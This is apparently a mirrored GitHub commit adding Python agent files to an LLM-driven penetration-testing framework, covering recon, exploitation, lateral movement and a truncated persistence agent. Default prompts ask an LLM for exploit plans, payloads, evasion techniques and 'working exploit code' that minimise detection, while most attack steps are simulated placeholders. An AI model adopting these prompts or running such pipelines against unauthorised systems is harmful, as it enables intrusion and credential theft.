mirror of
https://github.com/CyberSecurityUP/NeuroSploit.git
synced 2026-02-12 14:02:45 +00:00
Add files via upload
This commit is contained in:
0
agents/__init__.py
Normal file
0
agents/__init__.py
Normal file
78
agents/base_agent.py
Normal file
78
agents/base_agent.py
Normal file
@@ -0,0 +1,78 @@
|
|||||||
|
import json
|
||||||
|
import logging
|
||||||
|
from typing import Dict, Any, List, Optional
|
||||||
|
|
||||||
|
from core.llm_manager import LLMManager
|
||||||
|
|
||||||
|
logger = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
class BaseAgent:
|
||||||
|
"""
|
||||||
|
A generic agent class that orchestrates LLM interactions, tool usage,
|
||||||
|
and adheres to specific agent roles (e.g., Red Team, Blue Team).
|
||||||
|
"""
|
||||||
|
def __init__(self, agent_name: str, config: Dict, llm_manager: LLMManager, context_prompts: Dict):
|
||||||
|
self.agent_name = agent_name
|
||||||
|
self.config = config
|
||||||
|
self.llm_manager = llm_manager
|
||||||
|
self.context_prompts = context_prompts # This will contain user_prompt and system_prompt for this agent role
|
||||||
|
|
||||||
|
self.agent_role_config = self.config.get('agent_roles', {}).get(agent_name, {})
|
||||||
|
self.tools_allowed = self.agent_role_config.get('tools_allowed', [])
|
||||||
|
self.description = self.agent_role_config.get('description', 'No description provided.')
|
||||||
|
|
||||||
|
logger.info(f"Initialized {self.agent_name} agent. Description: {self.description}")
|
||||||
|
|
||||||
|
def _prepare_prompt(self, user_input: str, additional_context: Dict = None) -> str:
|
||||||
|
"""
|
||||||
|
Prepares the user prompt for the LLM, incorporating agent-specific instructions
|
||||||
|
and dynamic context.
|
||||||
|
"""
|
||||||
|
user_prompt_template = self.context_prompts.get("user_prompt", "")
|
||||||
|
if not user_prompt_template:
|
||||||
|
logger.warning(f"No user prompt template found for agent {self.agent_name}.")
|
||||||
|
return user_input # Fallback to raw user input
|
||||||
|
|
||||||
|
# Format the user prompt with dynamic context
|
||||||
|
# Use a safe way to format, ensuring all expected keys are present or handled.
|
||||||
|
# This assumes the template uses specific placeholders like {target_info_json}, {recon_data_json} etc.
|
||||||
|
# For a generic solution, we pass all additional_context as a single JSON.
|
||||||
|
try:
|
||||||
|
formatted_prompt = user_prompt_template.format(
|
||||||
|
user_input=user_input,
|
||||||
|
additional_context_json=json.dumps(additional_context or {}, indent=2)
|
||||||
|
# Add more specific placeholders if needed, like target_info_json, recon_data_json etc.
|
||||||
|
# E.g., target_info_json=json.dumps(additional_context.get('target_info', {}), indent=2)
|
||||||
|
)
|
||||||
|
except KeyError as e:
|
||||||
|
logger.error(f"Missing key in prompt template for {self.agent_name}: {e}. Falling back to basic prompt.")
|
||||||
|
formatted_prompt = f"{user_prompt_template}\n\nContext: {json.dumps(additional_context or {}, indent=2)}\n\nInput: {user_input}"
|
||||||
|
|
||||||
|
return formatted_prompt
|
||||||
|
|
||||||
|
def execute(self, user_input: str, campaign_data: Dict = None) -> Dict:
|
||||||
|
"""
|
||||||
|
Executes the agent's task using the LLM and potentially external tools.
|
||||||
|
`campaign_data` can be used to pass ongoing results or context between agent executions.
|
||||||
|
"""
|
||||||
|
logger.info(f"Executing {self.agent_name} agent for input: {user_input[:50]}...")
|
||||||
|
|
||||||
|
system_prompt = self.context_prompts.get("system_prompt", "")
|
||||||
|
if not system_prompt:
|
||||||
|
logger.warning(f"No system prompt found for agent {self.agent_name}. Using generic system prompt.")
|
||||||
|
system_prompt = f"You are an expert {self.agent_name}. Analyze the provided information and generate a response."
|
||||||
|
|
||||||
|
# Prepare the user prompt with current input and campaign data
|
||||||
|
prepared_user_prompt = self._prepare_prompt(user_input, campaign_data)
|
||||||
|
|
||||||
|
llm_response_text = self.llm_manager.generate(prepared_user_prompt, system_prompt)
|
||||||
|
|
||||||
|
# Here's where we would integrate tool usage based on llm_response_text
|
||||||
|
# and self.tools_allowed. This will be more complex and potentially involve
|
||||||
|
# re-prompting the LLM or using a function-calling mechanism.
|
||||||
|
# For now, just return the LLM's direct response.
|
||||||
|
return {"agent_name": self.agent_name, "input": user_input, "llm_response": llm_response_text}
|
||||||
|
|
||||||
|
def get_allowed_tools(self) -> List[str]:
|
||||||
|
"""Returns the list of tools allowed for this agent role."""
|
||||||
|
return self.tools_allowed
|
||||||
256
agents/exploitation_agent.py
Normal file
256
agents/exploitation_agent.py
Normal file
@@ -0,0 +1,256 @@
|
|||||||
|
#!/usr/bin/env python3
|
||||||
|
"""
|
||||||
|
Exploitation Agent - Vulnerability exploitation and access gaining
|
||||||
|
"""
|
||||||
|
|
||||||
|
import json
|
||||||
|
import logging
|
||||||
|
from typing import Dict, List
|
||||||
|
from core.llm_manager import LLMManager
|
||||||
|
from tools.exploitation import (
|
||||||
|
ExploitDatabase,
|
||||||
|
MetasploitWrapper,
|
||||||
|
WebExploiter,
|
||||||
|
SQLInjector,
|
||||||
|
RCEExploiter,
|
||||||
|
BufferOverflowExploiter
|
||||||
|
)
|
||||||
|
|
||||||
|
logger = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
|
class ExploitationAgent:
|
||||||
|
"""Agent responsible for vulnerability exploitation"""
|
||||||
|
|
||||||
|
def __init__(self, config: Dict):
|
||||||
|
"""Initialize exploitation agent"""
|
||||||
|
self.config = config
|
||||||
|
self.llm = LLMManager(config)
|
||||||
|
self.exploit_db = ExploitDatabase(config)
|
||||||
|
self.metasploit = MetasploitWrapper(config)
|
||||||
|
self.web_exploiter = WebExploiter(config)
|
||||||
|
self.sql_injector = SQLInjector(config)
|
||||||
|
self.rce_exploiter = RCEExploiter(config)
|
||||||
|
self.bof_exploiter = BufferOverflowExploiter(config)
|
||||||
|
|
||||||
|
logger.info("ExploitationAgent initialized")
|
||||||
|
|
||||||
|
def execute(self, target: str, context: Dict) -> Dict:
|
||||||
|
"""Execute exploitation phase"""
|
||||||
|
logger.info(f"Starting exploitation on {target}")
|
||||||
|
|
||||||
|
results = {
|
||||||
|
"target": target,
|
||||||
|
"status": "running",
|
||||||
|
"successful_exploits": [],
|
||||||
|
"failed_attempts": [],
|
||||||
|
"shells_obtained": [],
|
||||||
|
"credentials_found": [],
|
||||||
|
"ai_recommendations": {}
|
||||||
|
}
|
||||||
|
|
||||||
|
try:
|
||||||
|
# Get reconnaissance data from context
|
||||||
|
recon_data = context.get("phases", {}).get("recon", {})
|
||||||
|
|
||||||
|
# Phase 1: Vulnerability Analysis
|
||||||
|
logger.info("Phase 1: Analyzing vulnerabilities")
|
||||||
|
vulnerabilities = self._identify_vulnerabilities(recon_data)
|
||||||
|
|
||||||
|
# Phase 2: AI-powered Exploit Selection
|
||||||
|
logger.info("Phase 2: AI exploit selection")
|
||||||
|
exploit_plan = self._ai_exploit_planning(vulnerabilities, recon_data)
|
||||||
|
results["ai_recommendations"] = exploit_plan
|
||||||
|
|
||||||
|
# Phase 3: Execute Exploits
|
||||||
|
logger.info("Phase 3: Executing exploits")
|
||||||
|
for vuln in vulnerabilities[:5]: # Limit to top 5 vulnerabilities
|
||||||
|
exploit_result = self._attempt_exploitation(vuln, target)
|
||||||
|
|
||||||
|
if exploit_result.get("success"):
|
||||||
|
results["successful_exploits"].append(exploit_result)
|
||||||
|
logger.info(f"Successful exploit: {vuln.get('type')}")
|
||||||
|
|
||||||
|
# Check for shell access
|
||||||
|
if exploit_result.get("shell_access"):
|
||||||
|
results["shells_obtained"].append(exploit_result["shell_info"])
|
||||||
|
else:
|
||||||
|
results["failed_attempts"].append(exploit_result)
|
||||||
|
|
||||||
|
# Phase 4: Post-Exploitation Intelligence
|
||||||
|
if results["successful_exploits"]:
|
||||||
|
logger.info("Phase 4: Post-exploitation intelligence gathering")
|
||||||
|
results["post_exploit_intel"] = self._gather_post_exploit_intel(
|
||||||
|
results["successful_exploits"]
|
||||||
|
)
|
||||||
|
|
||||||
|
results["status"] = "completed"
|
||||||
|
logger.info("Exploitation phase completed")
|
||||||
|
|
||||||
|
except Exception as e:
|
||||||
|
logger.error(f"Error during exploitation: {e}")
|
||||||
|
results["status"] = "error"
|
||||||
|
results["error"] = str(e)
|
||||||
|
|
||||||
|
return results
|
||||||
|
|
||||||
|
def _identify_vulnerabilities(self, recon_data: Dict) -> List[Dict]:
|
||||||
|
"""Identify exploitable vulnerabilities from recon data"""
|
||||||
|
vulnerabilities = []
|
||||||
|
|
||||||
|
# Check network scan results
|
||||||
|
network_scan = recon_data.get("network_scan", {})
|
||||||
|
for host, data in network_scan.get("hosts", {}).items():
|
||||||
|
for port in data.get("open_ports", []):
|
||||||
|
vuln = {
|
||||||
|
"type": "network_service",
|
||||||
|
"host": host,
|
||||||
|
"port": port.get("port"),
|
||||||
|
"service": port.get("service"),
|
||||||
|
"version": port.get("version")
|
||||||
|
}
|
||||||
|
vulnerabilities.append(vuln)
|
||||||
|
|
||||||
|
# Check web vulnerabilities
|
||||||
|
web_analysis = recon_data.get("web_analysis", {})
|
||||||
|
for vuln_type in ["sql_injection", "xss", "lfi", "rfi", "rce"]:
|
||||||
|
if web_analysis.get(vuln_type):
|
||||||
|
vulnerabilities.append({
|
||||||
|
"type": vuln_type,
|
||||||
|
"details": web_analysis[vuln_type]
|
||||||
|
})
|
||||||
|
|
||||||
|
return vulnerabilities
|
||||||
|
|
||||||
|
def _ai_exploit_planning(self, vulnerabilities: List[Dict], recon_data: Dict) -> Dict:
|
||||||
|
"""Use AI to plan exploitation strategy"""
|
||||||
|
prompt = self.llm.get_prompt(
|
||||||
|
"exploitation",
|
||||||
|
"ai_exploit_planning_user",
|
||||||
|
default=f"""
|
||||||
|
Plan an exploitation strategy based on the following data:
|
||||||
|
|
||||||
|
Vulnerabilities Identified:
|
||||||
|
{json.dumps(vulnerabilities, indent=2)}
|
||||||
|
|
||||||
|
Reconnaissance Data:
|
||||||
|
{json.dumps(recon_data, indent=2)}
|
||||||
|
|
||||||
|
Provide:
|
||||||
|
1. Prioritized exploitation order
|
||||||
|
2. Recommended exploits for each vulnerability
|
||||||
|
3. Payload suggestions
|
||||||
|
4. Evasion techniques
|
||||||
|
5. Fallback strategies
|
||||||
|
6. Success probability estimates
|
||||||
|
|
||||||
|
Response in JSON format with detailed exploitation roadmap.
|
||||||
|
"""
|
||||||
|
)
|
||||||
|
|
||||||
|
system_prompt = self.llm.get_prompt(
|
||||||
|
"exploitation",
|
||||||
|
"ai_exploit_planning_system",
|
||||||
|
default="""You are an expert exploit developer and penetration tester.
|
||||||
|
Create sophisticated exploitation plans considering detection, success rates, and impact.
|
||||||
|
Prioritize stealthy, reliable exploits over noisy attempts."""
|
||||||
|
)
|
||||||
|
|
||||||
|
try:
|
||||||
|
formatted_prompt = prompt.format(
|
||||||
|
vulnerabilities_json=json.dumps(vulnerabilities, indent=2),
|
||||||
|
recon_data_json=json.dumps(recon_data, indent=2)
|
||||||
|
)
|
||||||
|
response = self.llm.generate(formatted_prompt, system_prompt)
|
||||||
|
return json.loads(response)
|
||||||
|
except Exception as e:
|
||||||
|
logger.error(f"AI exploit planning error: {e}")
|
||||||
|
return {"error": str(e)}
|
||||||
|
|
||||||
|
def _attempt_exploitation(self, vulnerability: Dict, target: str) -> Dict:
|
||||||
|
"""Attempt to exploit a specific vulnerability"""
|
||||||
|
vuln_type = vulnerability.get("type")
|
||||||
|
|
||||||
|
result = {
|
||||||
|
"vulnerability": vulnerability,
|
||||||
|
"success": False,
|
||||||
|
"method": None,
|
||||||
|
"details": {}
|
||||||
|
}
|
||||||
|
|
||||||
|
try:
|
||||||
|
if vuln_type == "sql_injection":
|
||||||
|
result = self.sql_injector.exploit(target, vulnerability)
|
||||||
|
elif vuln_type in ["xss", "csrf"]:
|
||||||
|
result = self.web_exploiter.exploit(target, vulnerability)
|
||||||
|
elif vuln_type in ["rce", "command_injection"]:
|
||||||
|
result = self.rce_exploiter.exploit(target, vulnerability)
|
||||||
|
elif vuln_type == "buffer_overflow":
|
||||||
|
result = self.bof_exploiter.exploit(target, vulnerability)
|
||||||
|
elif vuln_type == "network_service":
|
||||||
|
result = self._exploit_network_service(target, vulnerability)
|
||||||
|
else:
|
||||||
|
# Use Metasploit for generic exploitation
|
||||||
|
result = self.metasploit.exploit(target, vulnerability)
|
||||||
|
|
||||||
|
except Exception as e:
|
||||||
|
logger.error(f"Exploitation error for {vuln_type}: {e}")
|
||||||
|
result["error"] = str(e)
|
||||||
|
|
||||||
|
return result
|
||||||
|
|
||||||
|
def _exploit_network_service(self, target: str, vulnerability: Dict) -> Dict:
|
||||||
|
"""Exploit network service vulnerabilities"""
|
||||||
|
service = vulnerability.get("service", "").lower()
|
||||||
|
|
||||||
|
# Check exploit database for known exploits
|
||||||
|
exploits = self.exploit_db.search(service, vulnerability.get("version"))
|
||||||
|
|
||||||
|
if exploits:
|
||||||
|
logger.info(f"Found {len(exploits)} exploits for {service}")
|
||||||
|
|
||||||
|
for exploit in exploits[:3]: # Try top 3 exploits
|
||||||
|
result = self.metasploit.run_exploit(
|
||||||
|
exploit["module"],
|
||||||
|
target,
|
||||||
|
vulnerability.get("port")
|
||||||
|
)
|
||||||
|
|
||||||
|
if result.get("success"):
|
||||||
|
return result
|
||||||
|
|
||||||
|
return {"success": False, "message": "No suitable exploits found"}
|
||||||
|
|
||||||
|
def _gather_post_exploit_intel(self, successful_exploits: List[Dict]) -> Dict:
|
||||||
|
"""Gather intelligence after successful exploitation"""
|
||||||
|
intel = {
|
||||||
|
"system_info": [],
|
||||||
|
"user_accounts": [],
|
||||||
|
"network_info": [],
|
||||||
|
"installed_software": [],
|
||||||
|
"credentials": []
|
||||||
|
}
|
||||||
|
|
||||||
|
for exploit in successful_exploits:
|
||||||
|
if exploit.get("shell_access"):
|
||||||
|
shell = exploit["shell_info"]
|
||||||
|
|
||||||
|
# Gather system information
|
||||||
|
# This would execute actual commands on compromised system
|
||||||
|
# Placeholder for demonstration
|
||||||
|
intel["system_info"].append({
|
||||||
|
"os": "detected_os",
|
||||||
|
"hostname": "detected_hostname",
|
||||||
|
"architecture": "x64"
|
||||||
|
})
|
||||||
|
|
||||||
|
return intel
|
||||||
|
|
||||||
|
def generate_custom_exploit(self, vulnerability: Dict) -> str:
|
||||||
|
"""Generate custom exploit using AI"""
|
||||||
|
target_info = {
|
||||||
|
"vulnerability": vulnerability,
|
||||||
|
"requirements": "Create working exploit code"
|
||||||
|
}
|
||||||
|
|
||||||
|
return self.llm.generate_payload(target_info, vulnerability.get("type"))
|
||||||
199
agents/lateral_agent.py
Normal file
199
agents/lateral_agent.py
Normal file
@@ -0,0 +1,199 @@
|
|||||||
|
#!/usr/bin/env python3
|
||||||
|
"""
|
||||||
|
Lateral Movement Agent - Move through the network
|
||||||
|
"""
|
||||||
|
|
||||||
|
import json
|
||||||
|
import logging
|
||||||
|
from typing import Dict, List
|
||||||
|
from core.llm_manager import LLMManager
|
||||||
|
|
||||||
|
logger = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
|
class LateralMovementAgent:
|
||||||
|
"""Agent responsible for lateral movement"""
|
||||||
|
|
||||||
|
def __init__(self, config: Dict):
|
||||||
|
"""Initialize lateral movement agent"""
|
||||||
|
self.config = config
|
||||||
|
self.llm = LLMManager(config)
|
||||||
|
logger.info("LateralMovementAgent initialized")
|
||||||
|
|
||||||
|
def execute(self, target: str, context: Dict) -> Dict:
|
||||||
|
"""Execute lateral movement phase"""
|
||||||
|
logger.info(f"Starting lateral movement from {target}")
|
||||||
|
|
||||||
|
results = {
|
||||||
|
"target": target,
|
||||||
|
"status": "running",
|
||||||
|
"discovered_hosts": [],
|
||||||
|
"compromised_hosts": [],
|
||||||
|
"credentials_used": [],
|
||||||
|
"movement_paths": [],
|
||||||
|
"ai_analysis": {}
|
||||||
|
}
|
||||||
|
|
||||||
|
try:
|
||||||
|
# Get previous phase data
|
||||||
|
recon_data = context.get("phases", {}).get("recon", {})
|
||||||
|
privesc_data = context.get("phases", {}).get("privilege_escalation", {})
|
||||||
|
|
||||||
|
# Phase 1: Network Discovery
|
||||||
|
logger.info("Phase 1: Internal network discovery")
|
||||||
|
results["discovered_hosts"] = self._discover_internal_network(recon_data)
|
||||||
|
|
||||||
|
# Phase 2: AI-Powered Movement Strategy
|
||||||
|
logger.info("Phase 2: AI lateral movement strategy")
|
||||||
|
strategy = self._ai_movement_strategy(context, results["discovered_hosts"])
|
||||||
|
results["ai_analysis"] = strategy
|
||||||
|
|
||||||
|
# Phase 3: Credential Reuse
|
||||||
|
logger.info("Phase 3: Credential reuse attacks")
|
||||||
|
credentials = privesc_data.get("credentials_harvested", [])
|
||||||
|
results["credentials_used"] = self._attempt_credential_reuse(
|
||||||
|
results["discovered_hosts"],
|
||||||
|
credentials
|
||||||
|
)
|
||||||
|
|
||||||
|
# Phase 4: Pass-the-Hash/Pass-the-Ticket
|
||||||
|
logger.info("Phase 4: Pass-the-Hash/Ticket attacks")
|
||||||
|
results["movement_paths"].extend(
|
||||||
|
self._pass_the_hash_attacks(results["discovered_hosts"])
|
||||||
|
)
|
||||||
|
|
||||||
|
# Phase 5: Exploit Trust Relationships
|
||||||
|
logger.info("Phase 5: Exploiting trust relationships")
|
||||||
|
results["movement_paths"].extend(
|
||||||
|
self._exploit_trust_relationships(results["discovered_hosts"])
|
||||||
|
)
|
||||||
|
|
||||||
|
results["status"] = "completed"
|
||||||
|
logger.info("Lateral movement phase completed")
|
||||||
|
|
||||||
|
except Exception as e:
|
||||||
|
logger.error(f"Error during lateral movement: {e}")
|
||||||
|
results["status"] = "error"
|
||||||
|
results["error"] = str(e)
|
||||||
|
|
||||||
|
return results
|
||||||
|
|
||||||
|
def _discover_internal_network(self, recon_data: Dict) -> List[Dict]:
|
||||||
|
"""Discover internal network hosts"""
|
||||||
|
hosts = []
|
||||||
|
|
||||||
|
# Extract hosts from recon data
|
||||||
|
network_scan = recon_data.get("network_scan", {})
|
||||||
|
for ip, data in network_scan.get("hosts", {}).items():
|
||||||
|
hosts.append({
|
||||||
|
"ip": ip,
|
||||||
|
"ports": data.get("open_ports", []),
|
||||||
|
"os": data.get("os", "unknown")
|
||||||
|
})
|
||||||
|
|
||||||
|
# Simulate additional internal discovery
|
||||||
|
hosts.extend([
|
||||||
|
{"ip": "192.168.1.10", "role": "domain_controller", "status": "discovered"},
|
||||||
|
{"ip": "192.168.1.20", "role": "file_server", "status": "discovered"},
|
||||||
|
{"ip": "192.168.1.30", "role": "workstation", "status": "discovered"}
|
||||||
|
])
|
||||||
|
|
||||||
|
return hosts
|
||||||
|
|
||||||
|
def _ai_movement_strategy(self, context: Dict, hosts: List[Dict]) -> Dict:
|
||||||
|
"""Use AI to plan lateral movement"""
|
||||||
|
prompt = self.llm.get_prompt(
|
||||||
|
"lateral_movement",
|
||||||
|
"ai_movement_strategy_user",
|
||||||
|
default=f"""
|
||||||
|
Plan a lateral movement strategy based on the following:
|
||||||
|
|
||||||
|
Current Context:
|
||||||
|
{json.dumps(context, indent=2)}
|
||||||
|
|
||||||
|
Discovered Hosts:
|
||||||
|
{json.dumps(hosts, indent=2)}
|
||||||
|
|
||||||
|
Provide:
|
||||||
|
1. Target prioritization (high-value targets first)
|
||||||
|
2. Movement techniques for each target
|
||||||
|
3. Credential strategies
|
||||||
|
4. Evasion techniques
|
||||||
|
5. Attack path optimization
|
||||||
|
6. Fallback options
|
||||||
|
|
||||||
|
Response in JSON format with detailed attack paths.
|
||||||
|
"""
|
||||||
|
)
|
||||||
|
|
||||||
|
system_prompt = self.llm.get_prompt(
|
||||||
|
"lateral_movement",
|
||||||
|
"ai_movement_strategy_system",
|
||||||
|
default="""You are an expert in lateral movement and Active Directory attacks.
|
||||||
|
Plan sophisticated movement strategies that minimize detection and maximize impact.
|
||||||
|
Consider Pass-the-Hash, Pass-the-Ticket, RDP, WMI, PSExec, and other techniques.
|
||||||
|
Prioritize domain controllers and critical infrastructure."""
|
||||||
|
)
|
||||||
|
|
||||||
|
try:
|
||||||
|
formatted_prompt = prompt.format(
|
||||||
|
context_json=json.dumps(context, indent=2),
|
||||||
|
hosts_json=json.dumps(hosts, indent=2)
|
||||||
|
)
|
||||||
|
response = self.llm.generate(formatted_prompt, system_prompt)
|
||||||
|
return json.loads(response)
|
||||||
|
except Exception as e:
|
||||||
|
logger.error(f"AI movement strategy error: {e}")
|
||||||
|
return {"error": str(e)}
|
||||||
|
|
||||||
|
def _attempt_credential_reuse(self, hosts: List[Dict], credentials: List[Dict]) -> List[Dict]:
|
||||||
|
"""Attempt credential reuse across hosts"""
|
||||||
|
attempts = []
|
||||||
|
|
||||||
|
for host in hosts[:5]: # Limit attempts
|
||||||
|
for cred in credentials[:3]:
|
||||||
|
attempts.append({
|
||||||
|
"host": host.get("ip"),
|
||||||
|
"credential": "***hidden***",
|
||||||
|
"protocol": "SMB",
|
||||||
|
"success": False, # Simulated
|
||||||
|
"status": "simulated"
|
||||||
|
})
|
||||||
|
|
||||||
|
return attempts
|
||||||
|
|
||||||
|
def _pass_the_hash_attacks(self, hosts: List[Dict]) -> List[Dict]:
|
||||||
|
"""Perform Pass-the-Hash attacks"""
|
||||||
|
attacks = []
|
||||||
|
|
||||||
|
for host in hosts:
|
||||||
|
if host.get("role") in ["domain_controller", "file_server"]:
|
||||||
|
attacks.append({
|
||||||
|
"type": "pass_the_hash",
|
||||||
|
"target": host.get("ip"),
|
||||||
|
"technique": "SMB relay",
|
||||||
|
"success": False, # Simulated
|
||||||
|
"status": "simulated"
|
||||||
|
})
|
||||||
|
|
||||||
|
return attacks
|
||||||
|
|
||||||
|
def _exploit_trust_relationships(self, hosts: List[Dict]) -> List[Dict]:
|
||||||
|
"""Exploit trust relationships"""
|
||||||
|
exploits = []
|
||||||
|
|
||||||
|
# Domain trust exploitation
|
||||||
|
exploits.append({
|
||||||
|
"type": "domain_trust",
|
||||||
|
"description": "Cross-domain exploitation",
|
||||||
|
"status": "simulated"
|
||||||
|
})
|
||||||
|
|
||||||
|
# Kerberos delegation
|
||||||
|
exploits.append({
|
||||||
|
"type": "kerberos_delegation",
|
||||||
|
"description": "Unconstrained delegation abuse",
|
||||||
|
"status": "simulated"
|
||||||
|
})
|
||||||
|
|
||||||
|
return exploits
|
||||||
148
agents/network_recon_agent.py
Normal file
148
agents/network_recon_agent.py
Normal file
@@ -0,0 +1,148 @@
|
|||||||
|
#!/usr/bin/env python3
|
||||||
|
"""
|
||||||
|
Network Reconnaissance Agent - Network-focused information gathering and enumeration
|
||||||
|
"""
|
||||||
|
|
||||||
|
import os
|
||||||
|
import json
|
||||||
|
import subprocess
|
||||||
|
from typing import Dict, List
|
||||||
|
import logging
|
||||||
|
from core.llm_manager import LLMManager
|
||||||
|
from tools.recon import (
|
||||||
|
NetworkScanner,
|
||||||
|
OSINTCollector,
|
||||||
|
DNSEnumerator,
|
||||||
|
SubdomainFinder
|
||||||
|
)
|
||||||
|
from urllib.parse import urlparse # Added import
|
||||||
|
|
||||||
|
logger = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
|
class NetworkReconAgent:
|
||||||
|
"""Agent responsible for network-focused reconnaissance and information gathering"""
|
||||||
|
|
||||||
|
def __init__(self, config: Dict):
|
||||||
|
"""Initialize network reconnaissance agent"""
|
||||||
|
self.config = config
|
||||||
|
self.llm = LLMManager(config)
|
||||||
|
self.network_scanner = NetworkScanner(config)
|
||||||
|
self.osint = OSINTCollector(config)
|
||||||
|
self.dns_enum = DNSEnumerator(config)
|
||||||
|
self.subdomain_finder = SubdomainFinder(config)
|
||||||
|
|
||||||
|
logger.info("NetworkReconAgent initialized")
|
||||||
|
|
||||||
|
def execute(self, target: str, context: Dict) -> Dict:
|
||||||
|
"""Execute network reconnaissance phase"""
|
||||||
|
logger.info(f"Starting network reconnaissance on {target}")
|
||||||
|
|
||||||
|
results = {
|
||||||
|
"target": target,
|
||||||
|
"status": "running",
|
||||||
|
"findings": [],
|
||||||
|
"network_scan": {},
|
||||||
|
"osint": {},
|
||||||
|
"dns": {},
|
||||||
|
"subdomains": [],
|
||||||
|
"ai_analysis": {}
|
||||||
|
}
|
||||||
|
|
||||||
|
# Parse target to extract hostname if it's a URL
|
||||||
|
parsed_target = urlparse(target)
|
||||||
|
target_host = parsed_target.hostname or target # Use hostname if exists, otherwise original target
|
||||||
|
logger.info(f"Target for network tools: {target_host}")
|
||||||
|
|
||||||
|
try:
|
||||||
|
# Phase 1: Network Scanning
|
||||||
|
logger.info("Phase 1: Network scanning")
|
||||||
|
results["network_scan"] = self.network_scanner.scan(target_host) # Use target_host
|
||||||
|
|
||||||
|
# Phase 2: DNS Enumeration
|
||||||
|
logger.info("Phase 2: DNS enumeration")
|
||||||
|
results["dns"] = self.dns_enum.enumerate(target_host) # Use target_host
|
||||||
|
|
||||||
|
# Phase 3: Subdomain Discovery
|
||||||
|
logger.info("Phase 3: Subdomain discovery")
|
||||||
|
results["subdomains"] = self.subdomain_finder.find(target_host) # Use target_host
|
||||||
|
|
||||||
|
# Phase 4: OSINT Collection
|
||||||
|
logger.info("Phase 4: OSINT collection")
|
||||||
|
results["osint"] = self.osint.collect(target_host) # Use target_host
|
||||||
|
|
||||||
|
# Phase 5: AI Analysis
|
||||||
|
logger.info("Phase 5: AI-powered analysis")
|
||||||
|
results["ai_analysis"] = self._ai_analysis(results)
|
||||||
|
|
||||||
|
results["status"] = "completed"
|
||||||
|
logger.info("Network reconnaissance phase completed")
|
||||||
|
|
||||||
|
except Exception as e:
|
||||||
|
logger.error(f"Error during network reconnaissance: {e}")
|
||||||
|
results["status"] = "error"
|
||||||
|
results["error"] = str(e)
|
||||||
|
|
||||||
|
return results
|
||||||
|
|
||||||
|
def _ai_analysis(self, recon_data: Dict) -> Dict:
|
||||||
|
"""Use AI to analyze reconnaissance data"""
|
||||||
|
prompt = self.llm.get_prompt(
|
||||||
|
"network_recon",
|
||||||
|
"ai_analysis_user",
|
||||||
|
default=f"""
|
||||||
|
Analyze the following network reconnaissance data and provide insights:
|
||||||
|
|
||||||
|
{json.dumps(recon_data, indent=2)}
|
||||||
|
|
||||||
|
Provide:
|
||||||
|
1. Attack surface summary
|
||||||
|
2. Prioritized network target list
|
||||||
|
3. Identified network vulnerabilities or misconfigurations
|
||||||
|
4. Recommended next steps for network exploitation
|
||||||
|
5. Network risk assessment
|
||||||
|
6. Stealth considerations for network activities
|
||||||
|
|
||||||
|
Response in JSON format with actionable recommendations.
|
||||||
|
"""
|
||||||
|
)
|
||||||
|
|
||||||
|
system_prompt = self.llm.get_prompt(
|
||||||
|
"network_recon",
|
||||||
|
"ai_analysis_system",
|
||||||
|
default="""You are an expert network penetration tester analyzing reconnaissance data.
|
||||||
|
Identify network security weaknesses, network attack vectors, and provide strategic recommendations.
|
||||||
|
Consider both technical and operational security aspects."""
|
||||||
|
)
|
||||||
|
|
||||||
|
try:
|
||||||
|
# Format the user prompt with recon_data
|
||||||
|
formatted_prompt = prompt.format(recon_data_json=json.dumps(recon_data, indent=2))
|
||||||
|
response = self.llm.generate(formatted_prompt, system_prompt)
|
||||||
|
return json.loads(response)
|
||||||
|
except Exception as e:
|
||||||
|
logger.error(f"AI analysis error: {e}")
|
||||||
|
return {"error": str(e), "raw_response": response if 'response' in locals() else None}
|
||||||
|
|
||||||
|
def passive_recon(self, target: str) -> Dict:
|
||||||
|
"""Perform passive reconnaissance only"""
|
||||||
|
# Parse target to extract hostname if it's a URL
|
||||||
|
parsed_target = urlparse(target)
|
||||||
|
target_host = parsed_target.hostname or target
|
||||||
|
|
||||||
|
return {
|
||||||
|
"osint": self.osint.collect(target_host), # Use target_host
|
||||||
|
"dns": self.dns_enum.enumerate(target_host), # Use target_host
|
||||||
|
"subdomains": self.subdomain_finder.find(target_host) # Use target_host
|
||||||
|
}
|
||||||
|
|
||||||
|
def active_recon(self, target: str) -> Dict:
|
||||||
|
"""Perform active reconnaissance"""
|
||||||
|
# Parse target to extract hostname if it's a URL
|
||||||
|
parsed_target = urlparse(target)
|
||||||
|
target_host = parsed_target.hostname or target
|
||||||
|
|
||||||
|
return {
|
||||||
|
"network_scan": self.network_scanner.scan(target_host) # Use target_host
|
||||||
|
}
|
||||||
|
|
||||||
250
agents/persistence_agent.py
Normal file
250
agents/persistence_agent.py
Normal file
@@ -0,0 +1,250 @@
|
|||||||
|
#!/usr/bin/env python3
|
||||||
|
"""
|
||||||
|
Persistence Agent - Maintain access to compromised systems
|
||||||
|
"""
|
||||||
|
|
||||||
|
import json
|
||||||
|
import logging
|
||||||
|
from typing import Dict, List
|
||||||
|
from core.llm_manager import LLMManager
|
||||||
|
|
||||||
|
logger = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
|
class PersistenceAgent:
|
||||||
|
"""Agent responsible for maintaining access"""
|
||||||
|
|
||||||
|
def __init__(self, config: Dict):
|
||||||
|
"""Initialize persistence agent"""
|
||||||
|
self.config = config
|
||||||
|
self.llm = LLMManager(config)
|
||||||
|
logger.info("PersistenceAgent initialized")
|
||||||
|
|
||||||
|
def execute(self, target: str, context: Dict) -> Dict:
|
||||||
|
"""Execute persistence phase"""
|
||||||
|
logger.info(f"Starting persistence establishment on {target}")
|
||||||
|
|
||||||
|
results = {
|
||||||
|
"target": target,
|
||||||
|
"status": "running",
|
||||||
|
"persistence_mechanisms": [],
|
||||||
|
"backdoors_installed": [],
|
||||||
|
"scheduled_tasks": [],
|
||||||
|
"ai_recommendations": {}
|
||||||
|
}
|
||||||
|
|
||||||
|
try:
|
||||||
|
# Get previous phase data
|
||||||
|
privesc_data = context.get("phases", {}).get("privilege_escalation", {})
|
||||||
|
|
||||||
|
if not privesc_data.get("successful_escalations"):
|
||||||
|
logger.warning("No privilege escalation achieved. Limited persistence options.")
|
||||||
|
results["status"] = "limited"
|
||||||
|
|
||||||
|
# Phase 1: AI-Powered Persistence Strategy
|
||||||
|
